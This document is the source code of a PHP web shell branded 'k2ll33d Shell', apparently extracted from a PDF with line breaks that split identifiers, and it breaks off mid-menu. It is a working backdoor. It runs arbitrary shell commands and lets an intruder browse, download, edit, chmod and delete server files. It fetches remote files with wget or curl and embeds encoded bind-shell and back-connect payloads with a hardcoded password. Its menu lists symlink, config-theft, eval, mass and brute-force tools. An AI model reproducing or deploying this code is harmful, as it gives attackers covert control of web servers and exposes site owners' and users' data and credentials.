R PHP PDF

<?
php
// by k2ll33d / fb/k2ll33d
set_time_limit(0);error_reporting(0);
if(isset($_GET["dl"]) && ($_GET["dl"] != "")){$file = $_GET["dl"];$filez = @file
_get_contents($file);header("Content-type: application/octet-stream");header("Co
ntent-length: ".strlen($filez));header("Content-disposition: attachment;filename
=".basename($file).";");echo $filez;exit;}
elseif(isset($_GET["dlgzip"]) && ($_GET["dlgzip"] != "")){$file = $_GET['dlgzip'
];$filez = gzencode(@file_get_contents($file));header("Content-Type:application/
x-gzip\n");header("Content-length: ".strlen($filez));header("Content-disposition
: attachment;filename=".basename($file).".gz;");echo $filez;exit;}
if(isset($_GET["img"])){@ob_clean();$d = magicboom($_GET["y"]);$f = $_GET["img"]
;$inf = @getimagesize($d.$f);$ext = explode($f,".");$ext = $ext[count($ext)-1];@
header("Content-type: ".$inf["mime"]);@header("Cache-control: public");@header("
Expires: ".date("r",mktime(0,0,0,1,1,2030)));@header("Cache-control: max-age=".(
60*60*24*7));@readfile($d.$f);exit;} $software = getenv("SERVER_SOFTWARE");
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemod
e = TRUE;else $safemode = FALSE;$system = @php_uname();if(strtolower(substr($sys
tem,0,3)) == "win")
$win = TRUE;else $win = FALSE;if(isset($_GET['y'])){if(@is_dir($_GET['view'])){$
pwd = $_GET['view'];@chdir($pwd);} else{$pwd = $_GET['y'];@chdir($pwd);} }
if(!$win){if(!$user = rapih(exe("whoami")))$user = "";if(!$id = rapih(exe("id"))
) $id = "";$prompt = $user." \$ ";$pwd = @getcwd().DIRECTORY_SEPARATOR;}
else {$user = @get_current_user();$id = $user;$prompt = $user." >";$pwd = rea
lpath(".")."\\";$v = explode("\\",$d);$v = $v[0];foreach (range("A","Z") as $let
ter) {$bool = @is_dir($letter.":\\");if ($bool){$letters .= "<a href='?y=".$lett
er.":\\'>[ ";if ($letter.":" != $v){$letters .= $letter;} else {$letters .= "<sp
an class='gaya'>".$letter."</span>";} $letters .= " ]</a> ";}}}
if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posi
x = TRUE;
else $posix = FALSE;$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);$my_ip =
$_SERVER['REMOTE_ADDR'];$bindport = "13123";$bindport_pass = "k2ll33d";$pwds = e
xplode(DIRECTORY_SEPARATOR,$pwd);$pwdurl = "";for($i = 0 ;$i < sizeof($pwds)-1 ;
$i++){$pathz = "";for($j = 0 ;$j <= $i ;$j++){$pathz .= $pwds[$j].DIRECTORY_SEPA
RATOR;} $pwdurl .= "<a href='?y=".$pathz."'>".$pwds[$i]." ".DIRECTORY_SEPARATOR.
" </a>";}
if(isset($_POST['rename'])){$old = $_POST['oldname'];$new = $_POST['newname'];@r
ename($pwd.$old,$pwd.$new);$file = $pwd.$new;}
if(isset($_POST['chmod'])){
$name = $_POST['name'];$value = $_POST['newvalue'];if (strlen($value)==3){$value
= 0 . "" . $value;}@chmod($pwd.$name,octdec($value));$file = $pwd.$name;}
if(isset($_POST['chmod_folder'])){$name = $_POST['name'];$value = $_POST['newval
ue'];if (strlen($value)==3){$value = 0 . "" . $value;}@chmod($pwd.$name,octdec($
value));$file = $pwd.$name;} $buff = " ".$software."<br>";$buff .= " "
.$system."<br>";if($id != "") $buff .= " ".$id."<br>";if($safemode) $buff .
= " safemode : <b><font style='color:#DD4736'>ON</font></b><br>";else
$buff .= " safemode : <b><font style='color:#00FF00'>OFF</font></b><br
>";
function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF0
0'>ON</font></b>";}else {return "<b><font style='color:#ff0000'>OFF</font></b>";
}}
function testmysql() {if (function_exists('mysql_connect')) {return showstat("on
");}else {return showstat("off");}}
function testcurl() {if (function_exists('curl_version')) {return showstat("on")
;}else {return showstat("off");}}
function testwget() {if (exe('wget --help')) {return showstat("on");}else {retur
n showstat("off");}}
function testperl() {if (exe('perl -h')) {return showstat("on");}else {return sh
owstat("off");}}
$buff .= " MySQL: ".testmysql()." | Perl: ".testperl()." |&n
bsp;cURL: ".testcurl()." | WGet: ".testwget()."<br>";
$buff .= " ".$letters." > ".$pwdurl;
function rapih($text){return trim(str_replace("<br>","",$text));}
function magicboom($text){if (!get_magic_quotes_gpc()){return $text;} return str
ipslashes($text);}
function showdir($pwd,$prompt){$fname = array();$dname = array();
if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))
$posix = TRUE;else $posix = FALSE;$user = "????:????";
if($dh = opendir($pwd)){while($file = readdir($dh)){
if(is_dir($file)){$dname[] = $file;}
elseif(is_file($file)){$fname[] = $file;}}closedir($dh);} sort($fname);sort($dna
me);$path = @explode(DIRECTORY_SEPARATOR,$pwd);$tree = @sizeof($path);$parent =
"";
$buff = " <form action='?y=".$pwd."&x=shell' method='post' style='margin:8px
0 0 0;'><table class='cmdbox' style='width:50%;'><tr><td>$prompt</td><td><input
onMouseOver='this.focus();' id='cmd' class='inputz' type='text' name='cmd' styl
e='width:400px;' value='' /><input class='inputzbut' type='submit' value='execut
e !' name='submitcmd' style='width:80px;' /></td></tr></form><form action='?' me
thod='get' style='margin:8px 0 0 0;'><input type='hidden' name='y' value='".$pwd
."' /><tr><td>view file/folder</td><center><td><input onMouseOver='this.focus();
' id='goto' class='inputz' type='text' name='view' style='width:400px;' value='"
.$pwd."' /><input class='inputzbut' type='submit' value='view !' name='submitcmd
' style='width:80px;' /></td></center></tr></form></table><table class='explore'
> <tr><th>name</th><th style='width:80px;'>size</th><th style='width:210px;'>own
er:group</th><th style='width:80px;'>perms</th><th style='width:110px;'>modified
</th><th style='width:190px;'>actions</th></tr> ";
if($tree > 2)
for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
else $parent = $pwd;
foreach($dname as $folder){
if($folder == ".") {
if(!$win && $posix){$name=@posix_getpwuid(@fileowner($folder));$group=@posix_get
grgid(@filegroup($folder));$owner = $name['name']."<span class='gaya'> : </span>
".$group['name'];}
else {$owner = $user;}
$buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>-</td>
<td style=\"text-align:center;\">".$owner."</td>
<td><center>".get_perms($pwd)."</center></td>
<td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td>
<span id=\"titik1\">
<a href=\"?y=$pwd&edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascr
ipt:tukar('titik1','titik1_form');\">newfolder</a>
</span><form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" s
tyle=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
<input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" valu
e=\"a_new_folder\" />
<input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\"
value=\"Go\" />
</form></td></tr> ";}
elseif($folder == ".."){
if(!$win && $posix)
{$name=@posix_getpwuid(@fileowner($folder));$group=@posix_getgrgid(@filegroup($f
older));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];}
else { $owner = $user; }
$buff .= "<tr><td>
<a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEU
gAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1
gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYU
K4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emX
cofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtt
eNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggk
UhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2
xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev
3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fB
uA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQS
rFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr
5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2
bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkj
DrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rf
X19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'></a></td><td>-<
/td>
<td style=\"text-align:center;\">".$owner."</td>
<td><center>".get_perms($parent)."</center></td> <td style=\"text-align:center;\
">".date("d-M-Y H:i",@filemtime($parent))."</td>
<td><span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">newf
ile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></s
pan>
<form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"
margin:0;padding:0;\">
<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
<input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" valu
e=\"a_new_folder\" />
<input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\"
value=\"Go\" />
</form></td></tr>";}else{if(!$win && $posix){
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];}
$buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folde
r.DIRECTORY_SEPARATOR."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUg
AAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEw
EAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2I
gayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cV
enIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jY
tzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg
==' /> $folder</a>
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" cla
ss=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;p
adding:0;\" />
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" va
lue=\"".$folder."\" />
<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" oncl
ick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
</form> </td><td>DIR</td><td style=\"text-align:center;\">".$owner."</td><td><ce
nter>
<a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)
."_form3');\">".get_perms($pwd.$folder)."</a>
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" cl
ass=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padd
ing:0;\" />
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" v
alue=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
<input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\"
/>
<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');
\" /></form></center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@f
ilemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."
_link','".clearspace($folder)."_form');\">rename</a>| <a href=\"?y=$pwd&fdel
ete=".$pwd.$folder."\">delete</a>
</td>
</tr>";}}
foreach($fname as $file){
$full = $pwd.$file;
if(!$win && $posix){$name=@posix_getpwuid(@fileowner($file)); $group=@posix_getg
rgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>
".$group['name'];}
$buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$
full\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8
/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0S
U1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdk
SLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZ
yAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAF
AVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9
F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhp
UQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzg
EonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sA
CDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f
2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEev
vK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpC
lhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> $file</a>
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class
=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;pad
ding:0;\" /><input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"
newname\" value=\"".$file."\" /><input class=\"inputzbut\" type=\"submit\" name=
\"rename\" value=\"rename\" /><input class=\"inputzbut\" type=\"submit\" name=\"
cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clears
pace($file)."_form');\" />
</form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner.
"</td><td><center>
<a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_f
orm2');\">".get_perms($full)."</a>
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" clas
s=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;paddin
g:0;\" />
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" v
alue=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
<input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" oncl
ick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></f
orm></center></td>
<td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
<td><a href=\"?y=$pwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('".
clearspace($file)."_link','".clearspace($file)."_form');\">rename</a>| <a href=\
"?y=$pwd&delete=$full\">delete</a> | <a href=\"?y=$pwd&dl=$full\">downlo
ad</a> (<a href=\"?y=$pwd&dlgzip=$full\">gz</a>)
</td></tr>";}
$buff .= "</table>"; return $buff;}
function ukuran($file){if($size = @filesize($file)){if($size <= 1024) return $si
ze;else{if($size <= 1024*1024) {$size = @round($size / 1024,2);;
return "$size kb";} else {$size = @round($size / 1024 / 1024,2);return "$size mb
";}}}
else return "???";} function exe($cmd){if(function_exists('system')) {@ob_start(

);@system($cmd);$buff = @ob_get_contents();$buff = @ob_get_contents();@ob_end_cl
ean();
return $buff;} elseif(function_exists('exec')) {@exec($cmd,$results);$buff = "";
foreach($results as $result){$buff .= $result;} return $buff;}
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$buff = @ob_get_
contents();@ob_end_clean();return $buff;}
elseif(function_exists('shell_exec')){$buff = @shell_exec($cmd);return $buff;}}
function tulis($file,$text){$textz = gzinflate(base64_decode($text));if($filez =
@fopen($file,"w")) {@fputs($filez,$textz);@fclose($file);}}
function ambil($link,$file) {if($fp = @fopen($link,"r")){while(!feof($fp)){$cont
.= @fread($fp,1024);}@fclose($fp);$fp2 = @fopen($file,"w");@fwrite($fp2,$cont);@
fclose($fp2);} }
function which($pr){$path = exe("which $pr");
if(!empty($path)) {return trim($path);}
else {return trim($pr);}}
function download($cmd,$url){$namafile = basename($url);
switch($cmd){case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;ca
se 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;case 'wfre
ad' : ambil($wurl,$namafile);break;case 'wfetch' : exe(which('fetch')." -o ".$na
mafile." -p ".$url);break;case 'wlinks' : exe(which('links')." -source ".$url."
> ".$namafile);break;case 'wget' : exe(which('GET')." ".$url." > ".$namafile);br
eak;case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;default: b
reak;}
return $namafile;}function get_perms($file) {if($mode=@fileperms($file)){$perms=
'';$perms .= ($mode & 00400) ? 'r' : '-';$perms .= ($mode & 00200) ? 'w' : '-';$
perms .= ($mode & 00100) ? 'x' : '-';$perms .= ($mode & 00040) ? 'r' : '-';$perm
s .= ($mode & 00020) ? 'w' : '-';$perms .= ($mode & 00010) ? 'x' : '-';$perms .=
($mode & 00004) ? 'r' : '-';$perms .= ($mode & 00002) ? 'w' : '-';$perms .= ($m
ode & 00001) ? 'x' : '-';
return $perms;}else return "??????????";}function clearspace($text){return str_r
eplace(" ","_",$text);}$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbS
LxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO
4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBi
rhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvX
SpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9Ov
URzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNe
ThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc
9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGb
qbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqk
dnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";$port_bind_bd
_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr
1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg t
NqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs
/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM
3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS1
6sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4Uc
LSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC
0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQG
sOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVp
SlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/by
r0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT5
2+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIB
elFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk56
60sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NA
rIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W
+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIA
hBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGv
PoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbP
PLw=="; ?>
<html><head><title>k2ll33d</title><link href='http://fonts.googleapis.com/css?fa
mily=Orbitron:700' rel='stylesheet' type='text/css'>
<script type="text/javascript">
function tukar(lama,baru){document.getElementById(lama).style.display = 'none';
document.getElementById(baru).style.display = 'block';}
</script>
<style>.title{font-weight:bold;letter-spacing:1px;font-family: "orbitron";color:
#00ff00;font-size:20px;text-shadow: 5px 5px 5px black;}input[type=text]{-moz-bo
x-shadow:0 0 1px black;-webkit-box-shadow:0 0 1px black;height:18px;margin-left:
5px;}input:focus, textarea:focus ,button:active{box-shadow: 0 0 5px #4C83AF;-we
bkit-box-shadow: 0 0 5px rgba(0, 0, 255, 1);-moz-box-shadow: 0 0 5px rgba(0, 0,
255, 1);background:#222222;overflow: auto;}#menu{font-family:orbitron;background
: #111111;margin:5px 2px 4px 2px;}div #menu li:hover {cursor:pointer;}div#menu l
i:hover>ul a:hover{width:118;background:red;}div#menu ul {margin:0;padding:0;flo
at:left;-moz-border-radius: 6px; border-radius: 12px; border:1px solid #555555;}
div#menu li {position:relative;display:block;float:left;}div#menu li:hover>ul {l
eft:0px;border-left:1px solid white;}div#menu a{display:block;float:left;font-fa
mily:orbitron;padding:4px 6px;margin:0;text-decoration:none;letter-spacing:1px;c
olor:white;}div#menu a:hover{background:rgba(160, 82, 45,0.3);font-family:orbitr
on;border-bottom:0px;}div#menu ul ul {position:absolute;top:18px;left:-990em;wid
th:130px;padding:5px 0 5px 0;background:black;margin-top:2px;}div#menu ul ul a {
padding:2px 2px 2px 10px;height:20px;float:none;display:block;color:white;}.k2ll
33d2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #00ff
00;font-size:25px;text-shadow: 5px 5px 5px black;} .mybox{-moz-border-radius: 10
px; border-radius: 10px;border:1px solid #EC4D00; padding:4px 2px;width:70%;line
-height:24px;background:#111111;box-shadow: 0px 4px 2px white;-webkit-box-shadow
: 0px 4px 2px #ffffff;-moz-box-shadow: 0px 4px 2px #ffffff;}.myboxtbl{ width:50%
; }body{background:#010101;} a {text-decoration:none;} hr, a:hover{border-bottom
:1px solid #4C83AF;} *{text-shadow: 0pt 0pt 0.3em rgb(153, 153, 153);font-size:1
1px;font-family:Tahoma,Verdana,Arial;color:#FFFFFF;} .tabnet{margin:15px auto 0
auto;border: 1px solid #333333;} .main {width:100%;} .gaya {color: #888888;} .to
p{border-left:1px solid #4C83AF;border-RIGHT:1px solid #4C83AF;font-family:verda
na;} .inputz, option{outline:none;transition: all 0.20s ease-in-out;-webkit-tran
sition: all 0.20s ease-in-out;-moz-transition: all 0.20s ease-in-out;border:1px
solid rgba(0,0,0, 0.2);background:#111111; border:0; padding:2px; border-bottom:
1px solid #393939; font-size:11px; color:#ffffff; -moz-border-radius: 6px; borde
r-radius: 12px; border:1px solid #4C83AF;margin:4px 0 8px 0;} .inputzbut{backgro
und:#111111;color:#8f8f8f;margin:0 4px;border:1px solid #555555;} .inputzbut:ho
ver{background:#222222;border-left:1px solid #4C83AF;border-right:1px solid #4C8
3AF;border-bottom:1px solid #4C83AF;border-top:1px solid #4C83AF;}.inputz:hover{
-moz-border-radius: 6px; border-radius: 10px; border:1px solid #4C83AF;margin:4
px 0 8px 0;border-bottom:1px solid #4C83AF;border-top:1px solid #4C83AF;}.output
2 {margin:auto;border:1px solid #888888;background:#000000;padding:0 2px;} texta
rea{margin:auto;border:2px solid #555555;background:#000000;padding:0 2px;} .out
put {margin:auto;border:1px solid #303030;width:100%;height:400px;background:#00
0000;padding:0 2px;} .cmdbox{width:100%;}.head_info{padding: 0 4px;} .b1{font-si
ze:30px;padding:0;color:#555555;} .b2{font-size:30px;padding:0;color:#800000;} .
b_tbl{text-align:center;margin:0 4px 0 0;padding:0 4px 0 0;border-right:1px soli
d #333333;} .phpinfo table{width:100%;padding:0 0 0 0;} .phpinfo td{background:#
111111;color:#cccccc;padding:6px 8px;;} .phpinfo th, th{background:#191919;borde
r-bottom:1px solid #333333;font-weight:normal;} .phpinfo h2, .phpinfo h2 a{textalign:center;font-size:16px;padding:0;margin:30px 0 0 0;background:#222222;paddi
ng:4px 0;} .explore{width:100%;} .explore a {text-decoration:none;} .explore td{
border-bottom:1px solid #454545;padding:0 8px;line-height:24px;} .explore th{pad
ding:3px 8px;font-weight:normal;color:#999999;} .explore th:hover , .phpinfo th:
hover, th:hover{color:black;background:#00ff00;} .explore tr:hover{background:rg
ba(35,96,156,0.2);} .viewfile{background:#EDECEB;color:#000000;margin:4px 2px;pa
dding:8px;} .sembunyi{display:none;padding:0;margin:0;} k, k a, k a:hover{text-s
hadow: 0pt 0pt 0.3em red;font-family:orbitron;font-size:25px;color:#ffffff;}</st
yle><body onLoad="document.getElementById('cmd').focus();"><div class="main"><di
v class="head_info"> <table width="100%"><tr><td width="23%"><table class="b_tbl

">
<?php echo strtoupper((base64_decode('PGgyIGNsYXNzPSJ0aXRsZSI+azJsbDMzZCBTaGVsbD
wvaDI+ICA=')));?><div id="menu"><a href="?<?php echo "y=".$pwd;?>&x=about">A
bout Me</a></div>
</td></tr></table></td><td class="top" width='60%'><?php echo $buff;?></td>&nbsp
; <td style="width:20%;"><a>server ip : <?php echo $server_ip."<br><br> you
r ip : ".$my_ip."<br></a>";?><br><a href="?" style="border:1px solid #EC4D00;fon
t:12px orbitron;width:200px;padding:0px 20px 0px 20px;">H O M E</a></td></tr></t
able></div>
<div id="menu"><ul class="menu"><a href="?<?php echo "y=".$pwd;?>">Files</a><a h
ref="?<?php echo "y=".$pwd;?>&x=shell">Shell</a><a href="?<?php echo "y=".$p
wd;?>&x=upload">upload</a><li><a>Sym</a><ul><li><a href="?<?php echo "y=".$p
wd;?>&x=sf">Symlink File</a></li><li><a href="?<?php echo "y=".$pwd;?>&x
=sec">Symlink server</a></li><li><a href="?<?php echo "y=".$pwd;?>&x=configs
">Get configs</a></li></ul></li><a href="?<?php echo "y=".$pwd;?>&x=php">Eva
l</a><a href="?<?php echo "y=".$pwd;?>&x=back">Remote</a><a href="?<?php ech
o "y=".$pwd;?>&x=mysql">Sql</a><a href="?<?php echo "y=".$pwd;?>&x=mass"
>Mass</a><a href="?<?php echo "y=".$pwd;?>&x=brute">Brute</a><a href="?<?php
